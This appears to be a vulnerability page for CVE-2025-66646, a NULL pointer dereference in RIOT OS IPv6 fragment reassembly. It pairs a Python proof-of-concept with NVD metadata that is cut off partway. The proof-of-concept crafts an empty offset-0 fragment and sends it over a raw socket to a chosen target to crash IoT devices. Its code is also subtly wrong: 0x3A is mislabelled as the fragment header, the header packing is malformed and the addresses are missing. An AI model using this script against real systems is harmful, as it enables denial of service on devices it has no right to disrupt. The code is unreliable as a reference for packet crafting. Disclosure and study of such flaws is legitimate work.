CVE-2025-66646

import struct def create_ipv6_fragment_packet(offset=0, payload=b'', more_fragments=0): """ PoC for CVE-2025-66646: NULL pointer dereference in RIOT OS IPv6 fragmentation reassembly This PoC creates a malicious IPv6 fragment packet that triggers the vulnerability: - Fragment offset: 0 (first fragment) - Payload: Empty (triggers NULL pointer assignment) - More fragments flag: 0 (last fragment) """ # IPv6 Fragment Header format: # +-----------+-----------------------------+ # | Next Header | Reserved | # +-------------+-------------+--------------+ # | Fragment Offset | Res | M | | # +-------------+-------------+---------------+ # | Identification (32-bit) | # +-------------------------------------------+ next_header = 0x06 # TCP (example) reserved = 0x00 # Fragment offset (13 bits) | Reserved (2 bits) | M flag (1 bit) # offset=0, reserved=0, more_fragments=0 fragment_offset = (offset << 3) | (reserved << 1) | more_fragments identification = 0x12345678 # Arbitrary identifier fragment_header = struct.pack('!BBH I', next_header, reserved, fragment_offset, identification) # Add empty payload to trigger NULL pointer dereference return fragment_header + payload def send_malicious_packet(target_ip): """ Send the crafted packet to trigger CVE-2025-66646 Note: Requires raw socket privileges and IPv6 network access """ import socket # Create IPv6 raw socket sock = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # IPv6 base header version_class_flow = 0x60000000 payload_length = len(create_ipv6_fragment_packet(0, b'', 0)) next_header = 0x3A # IPv6-Frag hop_limit = 64 src_ip = "2001:db8::1" dst_ip = target_ip ipv6_header = struct.pack('!I BBH BB', version_class_flow, payload_length, next_header, hop_limit, 0, 0) # Source/dest addresses would be extended # Craft malicious fragment fragment = create_ipv6_fragment_packet(offset=0, payload=b'', more_fragments=0) # Full packet packet = ipv6_header + fragment # Send packet sock.sendto(packet, (dst_ip, 0)) sock.close() if __name__ == "__main__": print("CVE-2025-66646 PoC - RIOT OS IPv6 Fragmentation NULL Pointer Dereference") print("Usage: Run with root privileges and specify target IPv6 address")

{"cve": {"id": "CVE-2025-66646", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:56.170", "lastModified": "2026-01-22T16:22:00.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RIOT is an open-source microcontroller operating system, designed to match the requirements of Internet of Things (IoT) devices and other embedded devices. A vulnerability was discovered in the IPv6 fragmentation reassembly implementation of RIOT OS v2025.07. When receiving an fragmented IPv6 packet with fragment offset 0 and an empty payload, the payload pointer is set to NULL. However, the implementation still tries to copy the payload into the reassembly buffer, resulting in a NULL pointer dereference which crashes the OS (DoS). To trigger the vulnerability, the `gnrc_ipv6_ext_frag` module must be enabled and the attacker must be able to send arbitrary IPv6 packets to the victim. RIOT OS v2025.10 fixes the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:riot-os:riot:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.10", "matchCriteriaId": "3EE45C18-0705-45D6-9363-63017333DFF1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:riot-os:riot:2025.10:rc1:*:*:*:*:*:*", "matchCriteriaId": "6BEBF970-108C-4639-81A6-F2D307AC2959"}, {"vulnerable": true, "criteria": "cpe:2.3:o:riot-os:riot:2025.10:rc2:*:*:*:*:*:*", "matchCriteriaId": "A234F893-E4EF-436D-8B1B-E7B94B353374"}, {"vulnerable": true, "criteria": "cpe:2.3:o:riot-os:riot:2025.10:rc3:*:*:*:*:*:*", "matchCriteriaId": "31354945-C4EE-4017-99D3-AEAE3D435A85"}]}]}], "references": [{"url": "https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L411", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L420", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L490", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L532", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L534", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/RIOT-O ... (truncated)